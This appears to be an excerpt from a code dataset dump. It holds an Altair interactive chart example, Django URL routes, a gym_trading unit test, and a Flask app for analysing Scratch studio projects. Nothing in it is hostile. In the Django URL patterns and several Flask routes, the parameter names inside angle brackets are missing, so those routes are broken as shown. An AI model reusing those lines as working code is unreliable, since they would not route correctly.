"django.shortcuts.redirect", "line_number": 20, "usage_type": "call"}, {"api_name": "forms.EditProfileForm", "line_number": 26, "usage_type": "call"}, {"api_name": "forms.EditCandidateProfile", "line_number": 27, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 31, "usage_type": "call"}, {"api_name": "forms.EditProfileForm", "line_number": 33, "usage_type": "call"}, {"api_name": "forms.EditCandidateProfile", "line_number": 34, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "510108691", "text": "\"\"\"\nMulti-Line Highlight\n====================\nThis multi-line chart uses an invisible Voronoi tessellation to handle mouseover to\nidentify the nearest point and then highlight the line on which the point falls.\nIt is adapted from the Vega-Lite example found at\nhttps://bl.ocks.org/amitkaps/fe4238e716db53930b2f1a70d3401701\n\"\"\"\n# category: interactive charts\nimport altair as alt\nfrom vega_datasets import data\n\nsource = data.stocks()\n\nhighlight = alt.selection_point(on='mouseover',\n fields=['symbol'], nearest=True)\n\nbase = alt.Chart(source).encode(\n x='date:T',\n y='price:Q',\n color='symbol:N'\n)\n\npoints = base.mark_circle().encode(\n opacity=alt.value(0)\n).add_params(\n highlight\n).properties(\n width=600\n)\n\nlines = base.mark_line().encode(\n size=alt.condition(~highlight, alt.value(1), alt.value(3))\n)\n\npoints + lines\n", "sub_path": "tests/examples_arguments_syntax/multiline_highlight.py", "file_name": "multiline_highlight.py", "file_ext": "py", "file_size_in_byte": 867, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "vega_datasets.data.stocks", "line_number": 13, "usage_type": "call"}, {"api_name": "vega_datasets.data", "line_number": 13, "usage_type": "name"}, {"api_name": "altair.selection_point", "line_number": 15, "usage_type": "call"}, {"api_name": "altair.Chart", "line_number": 18, "usage_type": "call"}, {"api_name": "altair.value", "line_number": 25, "usage_type": "call"}, {"api_name": "altair.condition", "line_number": 33, "usage_type": "call"}, {"api_name": "altair.value", "line_number": 33, "usage_type": "call"}]}
+{"seq_id": "391227693", "text": "from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^add$', views.TaskInstanceAddView.as_view()),\n url(r'^(?P[^/]+)?$', views.TaskInstanceListView.as_view()),\n url(r'^deploy/(?P[^/]+)$', views.TaskInstanceDeployView.as_view()),\n url(r'^undeploy/(?P[^/]+)$', views.TaskInstanceUndeployView.as_view()),\n url(r'^get_addresses/(?P[^/]+)$', views.GetTaskInstanceAddressesView.as_view()),\n]\n", "sub_path": "src/deploy/deployer/task_instances/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 442, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "193883325", "text": "import unittest\n\nimport gym\n\nimport gym_trading\nfrom gym_trading.utils.decorator import print_time\n\n\nclass MarketMakerTestCases(unittest.TestCase):\n\n @print_time\n def test_time_event_env(self):\n config = dict(\n id=gym_trading.envs.MarketMaker.id,\n symbol='LTC-USD',\n fitting_file='demo_LTC-USD_20190926.csv.xz',\n testing_file='demo_LTC-USD_20190926.csv.xz',\n max_position=10,\n window_size=5,\n seed=1,\n action_repeats=5,\n training=False,\n format_3d=True,\n reward_type='default',\n ema_alpha=None,\n )\n print(f\"**********\\n{config}\\n**********\")\n\n env = gym.make(**config)\n done = gym_trading.envs.test_env_loop(env=env)\n _ = env.reset()\n self.assertEqual(True, done)\n\n\nif __name__ == '__main__':\n unittest.main()\n", "sub_path": "gym_trading/tests/test_market_maker.py", "file_name": "test_market_maker.py", "file_ext": "py", "file_size_in_byte": 900, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "unittest.TestCase", "line_number": 9, "usage_type": "attribute"}, {"api_name": "gym_trading.envs", "line_number": 14, "usage_type": "attribute"}, {"api_name": "gym.make", "line_number": 29, "usage_type": "call"}, {"api_name": "gym_trading.envs.test_env_loop", "line_number": 30, "usage_type": "call"}, {"api_name": "gym_trading.envs", "line_number": 30, "usage_type": "attribute"}, {"api_name": "gym_trading.utils.decorator.print_time", "line_number": 11, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "145068320", "text": "import json\nimport logging\nimport markdown\nimport os\nimport threading\nimport time\nimport traceback\nimport random\nimport urllib\nfrom flask import Flask, redirect, render_template, request, Response, session, url_for, send_from_directory\nfrom flask_caching import Cache\nfrom ccl_scratch_tools import Parser\nfrom ccl_scratch_tools import Scraper\nfrom ccl_scratch_tools import Visualizer\nfrom werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError, NotFound\n\nfrom lib import common\nfrom lib import errors\nfrom lib import schema\nfrom lib import scrape\nfrom lib import tasks\nfrom lib import authentication\nfrom lib import admin\nfrom lib import display\nfrom lib import certificate\nfrom lib import summary\nfrom lib.authentication import admin_required, login_required\nfrom lib.reports import reporting\nfrom lib.settings import CACHE_DIRECTORY, CLRY, PROJECT_CACHE_LENGTH, PROJECT_DIRECTORY, REDIRECT_PAGES, SITE\n\napp = Flask(__name__)\napp.register_blueprint(reporting)\n\ntry:\n celery = tasks.make_celery(CLRY[\"name\"],\n CLRY[\"result_backend\"],\n CLRY[\"broker_url\"],\n app)\nexcept:\n logging.warn(\"Couldn't load celery.\")\n\nparser = Parser()\n\napp.jinja_env.filters[\"twodec\"] = common.twodec\napp.jinja_env.filters[\"indexOf\"] = common.indexOf\napp.jinja_env.filters[\"pluralize\"] = common.pluralize\napp.jinja_env.filters[\"human_block\"] = common.human_block\napp.jinja_env.filters[\"get_selected\"] = common.get_selected\napp.secret_key = os.urandom(24)\napp.url_map.strict_slashes = False\n\napp.config[\"CACHE_TYPE\"] = \"lib.cache.MongoCache\"\napp.config[\"CACHE_DEFAULT_TIMEOUT\"] = 1200\n\ncache = Cache(app)\n\n\n# Pass things to all templates\n@app.context_processor\ndef inject_vars():\n return dict(user=authentication.get_login_info(),\n valid_admin_pages=admin.VALID_ADMIN_PAGES,\n SITE=SITE)\n\n\n# Helper routes\n@app.route(\"/redirect\", methods=[\"GET\"])\ndef redirect_to():\n if (request.args.get(\"username\") is not None\n and request.args.get(\"username\") != \"\"): # yapf: disable\n return redirect(\"/user/{0}\".format(\n urllib.parse.quote(request.args.get(\"username\"))))\n else:\n return render_template(\"index.html\",\n message=\"Sorry! 
I wasn't able to do that.\")\n\n\n# Authentication\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n    session.clear()\n\n    if request.method == \"GET\":\n        return render_template(\"login.html\")\n    else:\n        # yapf: disable\n        if (request.form[\"username\"] is None\n                or request.form[\"username\"] == \"\"\n                or request.form[\"password\"] is None\n                or request.form[\"password\"] == \"\"):\n            return render_template(\"login.html\",\n                                   message=\"All fields are required!\")\n        # yapf: enable\n\n        res = authentication.login_user(request.form[\"username\"],\n                                        request.form[\"password\"])\n        if res:\n            return redirect(\"/admin\")\n        else:\n            return render_template(\n                \"login.html\",\n                message=\"Couldn't log in with that username/password combination!\"\n            )\n\n\n@app.route(\"/logout\", methods=[\"GET\"])\ndef logout():\n    session.clear()\n    return render_template(\"login.html\", message=\"Successfully logged out.\")\n\n\n@app.route(\"/register\", methods=[\"POST\"])\ndef register():\n    res = authentication.register_user(request.form[\"username\"],\n                                       request.form[\"email\"],\n                                       request.form[\"first_name\"],\n                                       request.form[\"last_name\"],\n                                       request.form[\"password\"],\n                                       request.form[\"user_role\"])\n\n    if type(res) == bool and res:\n        return redirect(\"/login\")\n    else:\n        return render_template(\n            \"index.html\",\n            message=\"One or several of your inputs were invalid.\")\n\n\n# For when the site is brand new\n@app.route(\"/setup\", methods=[\"GET\"])\ndef setup():\n    common.connect_db()\n    if len(authentication.User.objects()) == 0:\n        session[\"user\"] = {\"role\": \"site_admin\"}\n        return render_template(\"setup.html\")\n    else:\n        return redirect(\"/\")\n\n\n# Admin pages\n@app.route(\"/admin\")\n@admin_required\ndef admin_index():\n    return render_template(\"admin/index.html\")\n\n\n@app.route(\"/admin/<page>\", methods=[\"GET\", \"POST\"])\n@admin_required\ndef admin_page(page):\n    if page in admin.VALID_ADMIN_PAGES:\n        if request.method == \"GET\":\n            info = admin.get_info(page)\n            return render_template(\"admin/{0}.html\".format(page), info=info)\n        else:\n            if request.is_json:\n                form = request.get_json()\n            else:\n                form = request.form\n            result = admin.set_info(page, form)\n\n            if \"redirect\" in request.form:\n                if request.form[\"redirect\"] in admin.VALID_REDIRECTS:\n                    return redirect(request.form[\"redirect\"])\n\n            return json.dumps(result)\n    else:\n        return redirect(\"/admin\")\n\n\n@app.route(\"/admin/cache/clear\")\n@admin_required\ndef clear_cache():\n    cache.clear()\n    return redirect(\"/admin\")\n\n\n@app.route(\"/admin/error/<eid>\")\n@admin_required\ndef error_page(eid):\n    error = errors.get_error(eid)\n    if not error:\n        return redirect(\"/admin/errors\")\n    else:\n        issue = {\n            \"title\":\n            \"{} error when loading {}\"\n            .format(error[\"error_code\"],\n                    urllib.parse.urlparse(error[\"url\"]).path),\n            \"body\":\n            \"**[Replicate here]({})**\\n\\nWhen accessing `{}`, there's a {} error. 
The traceback says:\\n\\n```python\\n{}\\n```\"\n            .format(error[\"url\"],\n                    urllib.parse.urlparse(error[\"url\"]).path,\n                    error[\"error_code\"],\n                    error[\"traceback\"])\n        }\n\n        return render_template(\"admin/error.html\", error=error, issue=issue)\n\n\ndef schema_editor(id):\n    data = {\n        \"min_instructions_length\": 0,\n        \"min_description_length\": 0,\n        \"min_comments_made\": 0,\n        \"min_blockify\": {\n            \"comments\": 0,\n            \"costumes\": 0,\n            \"sounds\": 0,\n            \"sprites\": 0,\n            \"variables\": 0\n        },\n        \"required_text\": [],\n        \"required_block_categories\": {},\n        \"required_blocks\": [],\n        \"stats\": [],\n        \"text\": {},\n        \"comparison_basis\": {\n            \"basis\": \"__none__\",\n            \"priority\": None\n        }\n    }\n\n    if id != \"__new__\":\n        common.connect_db()\n        try:\n            data = schema.Challenge.objects(id=id).first().to_mongo()\n        except AttributeError:\n            raise NotFound()\n\n    blocks = parser.block_data\n    block_list = list()\n    block_dict = dict()\n\n    for cat in blocks:\n        block_list += blocks[cat].keys()\n\n        for block in blocks[cat]:\n            block_dict[blocks[cat][block].lower().replace(\" \", \"\")] = block\n\n    return render_template(\"admin/edit_schema.html\",\n                           blocks=blocks,\n                           block_dict=block_dict,\n                           block_list=block_list,\n                           categories=list(blocks.keys()),\n                           data=data,\n                           schema_id=id,\n                           stats=scrape.get_default_studio_stats())\n\n\n@app.route(\"/admin/schemas/edit\", methods=[\"GET\"])\n@admin_required\ndef add_schema():\n    return schema_editor(\"__new__\")\n\n\n@app.route(\"/admin/schemas/edit/<id>\", methods=[\"GET\"])\n@admin_required\ndef edit_schema(id):\n    return schema_editor(id)\n\n\n# Studios, projects, users, challenges\n@app.route(\"/certificate/generate\")\n@admin_required\ndef generate_certificate():\n    common.connect_db()\n    authors = list(set(scrape.Project.objects().values_list(\"author\")))\n    certificate.generate_certs.delay(authors)\n\n    return redirect(\"/admin/utilities\")\n\n\n@app.route(\"/participation\")\ndef index():\n    return render_template(\"index.html\")\n\n\n@app.route(\"/md\", methods=[\"POST\"])\ndef md():\n    text = request.form[\"text\"]\n    if text is not None:\n        ret = {\"html\": common.md(text), \"js\": \"/static/js/sb.js\"}\n\n        return json.dumps(ret)\n    return \"False\"\n\n\n@app.route(\"/project/d\", methods=[\"POST\"])\ndef project_download():\n    if request.form[\"sid\"] is None or request.form[\"pid\"] is None:\n        return \"False\"\n    sid = request.form[\"sid\"]\n    pid = request.form[\"pid\"]\n\n    scraper = Scraper()\n    try:\n        pid = int(pid)\n    except:\n        return \"False\"\n\n    if pid in scraper.get_projects_in_studio(sid):\n        return str(scrape.add_project(pid, sid, CACHE_DIRECTORY))\n    else:\n        return \"False\"\n\n\n@app.route(\"/project/f/<pid>\", methods=[\"POST\"])\ndef project_feedback(pid):\n    if (\"_gu_uid\" in request.cookies and \"feelings\" in request.json\n            and \"minutes\" in request.json): # yapf: disable\n        try:\n            common.connect_db()\n            reflection = scrape.ProjectReflection(\n                project_id=pid,\n                gu_uid=request.cookies.get(\"_gu_uid\"),\n                minutes=int(request.json[\"minutes\"]),\n                feelings=request.json[\"feelings\"])\n            reflection.save()\n            return \"True\"\n        except:\n            return \"False\"\n    else:\n        return \"False\"\n\n\n@app.route(\"/project/o/<pid>\")\ndef feedback_owner(pid):\n    try:\n        common.connect_db()\n        reflection = scrape.ProjectReflection.objects(\n            project_id=pid).order_by(\"-timestamp\").first()\n        return reflection[\"gu_uid\"]\n    except:\n        return \"\"\n\n\n@app.route(\"/project/r/<pid>\")\ndef reload_project(pid):\n    try:\n        pid = int(pid)\n    except:\n        pid = 0\n\n    scrape.set_reload_page(pid)\n    return 
redirect(\"/project/{}\".format(pid))\n\n\n@app.route(\"/project//view\", methods=[\"GET\"])\n@cache.cached(timeout=PROJECT_CACHE_LENGTH,\n forced_update=scrape.get_reload_project,\n unless=authentication.session_active)\ndef project__id(pid):\n return display.get_project_page(pid, CACHE_DIRECTORY)\n\n\n@app.route(\"/project/\", methods=[\"GET\"])\ndef project_id(pid):\n return render_template(\"project_loader.html\")\n\n\n@app.route(\"/studio\", methods=[\"GET\", \"POST\"])\n@admin_required\ndef studio():\n if request.method == \"GET\":\n common.connect_db()\n return render_template(\"studio.html\",\n schemas=list(schema.Challenge.objects().order_by(\"-modified\"))) # yapf: disable\n else:\n scraper = Scraper()\n sid = scraper.get_id(request.form[\"studio\"])\n\n s = None\n if request.form[\"schema\"] != \"__none__\":\n s = request.form[\"schema\"]\n\n if request.form[\"studio\"] == \"__all__\":\n scrape.rescrape_all.delay(cache_directory=CACHE_DIRECTORY)\n return \"Started\"\n elif sid is not None:\n scrape.add_studio.delay(sid,\n schema=s,\n show=(\"show\" in request.form),\n cache_directory=CACHE_DIRECTORY)\n return redirect(\"/studio/{0}\".format(sid))\n else:\n return render_template(\n \"studio.html\",\n message=\"Please enter a valid studio ID or URL.\")\n\n\n@app.route(\"/studio/list/\")\ndef studio_list(sid):\n if sid == \"\":\n return \"Must include a studio ID.\", 400\n\n common.connect_db()\n studio = scrape.Studio.objects(studio_id=sid).first()\n\n if studio is None:\n return \"Studio does not exist.\", 404\n\n limit = 8\n page = 0\n order = \"author\"\n try:\n if \"page\" in request.args:\n page = int(request.args[\"page\"])\n if \"order\" in request.args:\n if request.args[\"order\"] in {\"author\", \"title\", \"id\", \"project_id\"}:\n order = request.args[\"order\"]\n if \"limit\" in request.args:\n if int(request.args[\"limit\"]) <= 100:\n limit = int(request.args[\"limit\"])\n except:\n return \"Invalid arguments\", 400\n\n skip = page * limit\n\n projects = scrape.Project.objects(\n studio_id=sid).order_by(order).skip(skip).limit(limit)\n info = {\"projects\": list()}\n for i, project in enumerate(projects):\n info[\"projects\"].append({\n \"project_id\": project[\"project_id\"],\n \"title\": project[\"title\"],\n \"author\": project[\"author\"],\n \"image\": (project[\"image\"] if \"image\" in project else \"\"),\n \"modified\": project[\"history\"][\"modified\"]\n })\n\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\n@app.route(\"/studio/\")\ndef studio_id(sid):\n if sid == \"\":\n return redirect(\"/prompts\")\n\n common.connect_db()\n studio = scrape.Studio.objects(studio_id=sid).first()\n\n if studio is None or (not (studio[\"public_show\"]\n or authentication.session_active())):\n return redirect(\"/prompts\")\n\n projects = list(scrape.Project.objects(studio_id=sid).order_by(\"author\"))\n info = {\"authors\": list(), \"project_ids\": list(), \"titles\": list()}\n\n for project in projects:\n info[\"authors\"].append(project[\"author\"].lower())\n info[\"project_ids\"].append(project[\"project_id\"])\n info[\"titles\"].append(project[\"title\"].lower())\n\n message = None\n if studio[\"status\"] == \"in_progress\" or studio[\"status\"] is None:\n message = \"This studio is currently in the process of being downloaded and analyzed. 
Refresh page.\"\n\n return render_template(\"studio_id.html\",\n info=info,\n projects=projects,\n studio=studio,\n message=message)\n\n\n@app.route(\"/user/\", methods=[\"GET\", \"POST\"])\ndef user_id(username):\n if request.method == \"POST\":\n return send_from_directory(f\"{CACHE_DIRECTORY}/certificates\",\n filename=\"{}.pdf\".format(username.lower()))\n else:\n common.connect_db()\n projects = list(scrape.Project.objects(author=username.lower()))\n studios = dict()\n\n keep_projects = list()\n for i, project in enumerate(projects):\n if project[\"studio_id\"] not in studios:\n studio = scrape.Studio.objects(\n studio_id=project[\"studio_id\"]).first()\n\n if studio is not None:\n studios[project[\"studio_id\"]] = studio\n keep_projects.append(project)\n else:\n keep_projects.append(project)\n\n return render_template(\"username.html\",\n projects=keep_projects,\n studios=studios,\n username=username)\n\n\n@app.route(\"/prompts\", methods=[\"GET\"])\n@cache.cached(timeout=600, unless=authentication.session_active)\ndef prompts():\n common.connect_db()\n studios = list(scrape.Studio.objects(public_show=True))\n schema_ids = set()\n for studio in studios:\n if \"challenge_id\" not in studio:\n studios.remove(studio)\n break\n\n schema_ids.add(studio[\"challenge_id\"])\n\n schemas = schema.Challenge.objects(id__in=schema_ids).order_by(\"short_label\", \"title\") # yapf: disable\n id_order = list(schemas.values_list(\"id\"))\n\n for i in range(len(id_order)):\n id_order[i] = str(id_order[i])\n\n schemas = schemas.as_pymongo()\n\n new_schemas = dict()\n for sc in schemas:\n new_schemas[str(sc[\"_id\"])] = sc\n\n # Order the studios\n ordered_studios = [None] * len(studios)\n for studio in studios:\n studio[\"challenge_id\"] = str(studio[\"challenge_id\"])\n\n try:\n ordered_studios[id_order.index(studio[\"challenge_id\"])] = studio\n except ValueError:\n pass\n\n return render_template(\"prompts.html\",\n challenges=ordered_studios,\n schemas=new_schemas)\n\n\n@app.route(\"/summary\", methods=[\"GET\", \"POST\"])\ndef summarize():\n if request.method == \"GET\":\n with open(\"{}/lib/data/summary.json\".format(PROJECT_DIRECTORY)) as f:\n data = json.load(f)\n\n for i, item in enumerate(data[\"content\"]):\n data[\"content\"][i] = common.md(item) if isinstance(item, str) else item # yapf: disable\n\n return render_template(\"summary.html\", data=data)\n else:\n with open(\"{}/data/summary.json\".format(CACHE_DIRECTORY)) as f:\n return Response(f.read(), mimetype=\"application/json\")\n\n\n@app.route(\"/summary/image\")\n@cache.cached()\ndef summary_image():\n try:\n with open(\"{}/cache/data/projects.jpg\".format(PROJECT_DIRECTORY), \"rb\") as f: # yapf: disable\n return f.read()\n except:\n return \"Not found\", 404\n\n\n@app.route(\"/summary/generate\")\n@admin_required\ndef generate_summary():\n summary.generate_summary_page.delay()\n return redirect(\"/admin/utilities\")\n\n\n# Static pages -- About, Strategies, Signup, Research\n@app.route(\"/\")\n@cache.cached(unless=authentication.session_active)\ndef homepage():\n return render_template(\"home.html\", section=\"home\")\n\n\n@app.route(\"/about\", methods=[\"GET\"])\n@cache.cached(unless=authentication.session_active)\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/strategies\", methods=[\"GET\"])\n@cache.cached(unless=authentication.session_active)\ndef strategies():\n return render_template(\"strategies.html\")\n\n\n@app.route(\"/signup\", methods=[\"GET\", 
\"POST\"])\n@cache.cached(unless=authentication.session_active)\ndef signup():\n return render_template(\"signup.html\")\n\n\n@app.route(\"/research\", methods=[\"GET\"])\n@cache.cached(unless=authentication.session_active)\ndef research():\n return render_template(\"research.html\")\n\n\n# Error pages\n@app.route(\"/ie\")\n@cache.cached(unless=authentication.session_active)\ndef ie():\n return render_template(\"ie.html\")\n\n\ndef error(e):\n \"\"\"Handle errors.\"\"\"\n\n if e.code == 404 and request.path in REDIRECT_PAGES:\n return redirect(REDIRECT_PAGES[request.path], code=301)\n\n status = \"closed\" if e.code == 404 else \"open\"\n saved = errors.add_error(e.code,\n request.url,\n traceback.format_exc(),\n status)\n\n if not isinstance(e, HTTPException):\n e = InternalServerError()\n\n scratch = \"when i receive [error {} v]\\n say [Oh no!]\\nswitch costume to (sad :\\( v)\".format(e.code) # yapf: disable\n\n return render_template(\"error.html\", error=e, scratch=scratch, saved=saved)\n\n\n# Listen for errors\nfor code in default_exceptions:\n app.errorhandler(code)(error)\n\nif __name__ == \"__main__\":\n app.run()\n", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 18887, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "flask.Flask", "line_number": 31, "usage_type": "call"}, {"api_name": "lib.reports.reporting", "line_number": 32, "usage_type": "argument"}, {"api_name": "lib.tasks.make_celery", "line_number": 35, "usage_type": "call"}, {"api_name": "lib.tasks", "line_number": 35, "usage_type": "name"}, {"api_name": "lib.settings.CLRY", "line_number": 35, "usage_type": "name"}, {"api_name": "lib.settings.CLRY", "line_number": 36, "usage_type": "name"}, {"api_name": "lib.settings.CLRY", "line_number": 37, "usage_type": "name"}, {"api_name": "logging.warn", "line_number": 40, "usage_type": "call"}, {"api_name": "ccl_scratch_tools.Parser", "line_number": 42, "usage_type": "call"}, {"api_name": "lib.common.twodec", "line_number": 44, "usage_type": "attribute"}, {"api_name": "lib.common", "line_number": 44, "usage_type": "name"}, {"api_name": "lib.common.indexOf", "line_number": 45, "usage_type": "attribute"}, {"api_name": "lib.common", "line_number": 45, "usage_type": "name"}, {"api_name": "lib.common.pluralize", "line_number": 46, "usage_type": "attribute"}, {"api_name": "lib.common", "line_number": 46, "usage_type": "name"}, {"api_name": "lib.common.human_block", "line_number": 47, "usage_type": "attribute"}, {"api_name": "lib.common", "line_number": 47, "usage_type": "name"}, {"api_name": "lib.common.get_selected", "line_number": 48, "usage_type": "attribute"}, {"api_name": "lib.common", "line_number": 48, "usage_type": "name"}, {"api_name": "os.urandom", "line_number": 49, "usage_type": "call"}, {"api_name": "flask_caching.Cache", "line_number": 55, "usage_type": "call"}, {"api_name": "lib.authentication.get_login_info", "line_number": 61, "usage_type": "call"}, {"api_name": "lib.authentication", "line_number": 61, "usage_type": "name"}, {"api_name": "lib.admin.VALID_ADMIN_PAGES", "line_number": 62, "usage_type": "attribute"}, {"api_name": "lib.admin", "line_number": 62, "usage_type": "name"}, {"api_name": "lib.settings.SITE", "line_number": 63, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 69, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 
69, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 70, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 70, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 71, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 72, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 72, "usage_type": "attribute"}, {"api_name": "flask.request.args.get", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 72, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.session.clear", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 81, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 87, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 87, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 89, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 91, "usage_type": "call"}, {"api_name": "lib.authentication.login_user", "line_number": 95, "usage_type": "call"}, {"api_name": "lib.authentication", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 95, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 96, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 96, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 98, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.session.clear", "line_number": 108, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 108, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 109, "usage_type": "call"}, {"api_name": "lib.authentication.register_user", "line_number": 114, "usage_type": "call"}, {"api_name": "lib.authentication", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 114, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 115, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 115, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 116, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 116, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 117, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 117, "usage_type": "name"}, {"api_name": 
"flask.request.form", "line_number": 118, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 118, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 119, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 124, "usage_type": "call"}, {"api_name": "lib.common.connect_db", "line_number": 132, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 132, "usage_type": "name"}, {"api_name": "lib.authentication.User.objects", "line_number": 133, "usage_type": "call"}, {"api_name": "lib.authentication.User", "line_number": 133, "usage_type": "attribute"}, {"api_name": "lib.authentication", "line_number": 133, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 135, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 137, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 144, "usage_type": "call"}, {"api_name": "lib.authentication.admin_required", "line_number": 142, "usage_type": "name"}, {"api_name": "lib.admin.VALID_ADMIN_PAGES", "line_number": 150, "usage_type": "attribute"}, {"api_name": "lib.admin", "line_number": 150, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 151, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 151, "usage_type": "name"}, {"api_name": "lib.admin.get_info", "line_number": 152, "usage_type": "call"}, {"api_name": "lib.admin", "line_number": 152, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 153, "usage_type": "call"}, {"api_name": "flask.request.is_json", "line_number": 155, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 155, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 156, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 156, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 158, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 158, "usage_type": "name"}, {"api_name": "lib.admin.set_info", "line_number": 159, "usage_type": "call"}, {"api_name": "lib.admin", "line_number": 159, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 161, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 161, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 162, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 162, "usage_type": "name"}, {"api_name": "lib.admin.VALID_REDIRECTS", "line_number": 162, "usage_type": "attribute"}, {"api_name": "lib.admin", "line_number": 162, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 163, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 163, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 163, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 165, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 167, "usage_type": "call"}, {"api_name": "lib.authentication.admin_required", "line_number": 148, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 174, "usage_type": "call"}, {"api_name": "lib.authentication.admin_required", "line_number": 171, "usage_type": "name"}, {"api_name": 
"lib.errors.get_error", "line_number": 180, "usage_type": "call"}, {"api_name": "lib.errors", "line_number": 180, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 182, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 188, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 188, "usage_type": "attribute"}, {"api_name": "urllib.parse.urlparse", "line_number": 192, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 192, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 197, "usage_type": "call"}, {"api_name": "lib.authentication.admin_required", "line_number": 178, "usage_type": "name"}, {"api_name": "lib.common.connect_db", "line_number": 224, "usage_type": "call"}, {"api_name": "lib.common", "line_number": 224, "usage_type": "name"}, {"api_name": "lib.schema.Challenge.objects", "line_number": 226, "usage_type": "call"}, {"api_name": "lib.schema.Challenge", "line_number": 226, "usage_type": "attribute"}, {"api_name": "lib.schema", "line_number": 226, "usage_type": 